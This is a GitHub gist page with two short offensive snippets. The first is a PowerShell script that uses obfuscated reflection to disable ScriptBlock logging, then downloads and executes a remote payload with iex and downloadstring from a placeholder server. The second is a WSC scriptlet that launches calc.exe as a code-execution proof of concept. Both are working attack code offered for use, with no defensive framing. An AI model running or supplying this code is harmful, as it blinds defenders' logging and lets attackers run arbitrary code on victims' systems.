Skip to content

Instantly share code, notes, and snippets.

View ssssanr's full-sized avatar

ssssanr

92 followers · 184 following
View GitHub Profile
@ssssanr
ssssanr / ScriptBlockLogBypass.ps1
Created June 29, 2017 07:45 — forked from cobbr/ScriptBlockLogBypass.ps1
ScriptBlock Logging Bypass
# ScriptBlock Logging Bypass
# @cobbr_io
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
iex (New-Object Net.WebClient).downloadstring("https://myserver/mypayload.ps1")
@ssssanr
ssssanr / demo.wsc
Created April 29, 2017 11:39
<?xml version="1.0"?>
<package>
<component id="Calc">
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>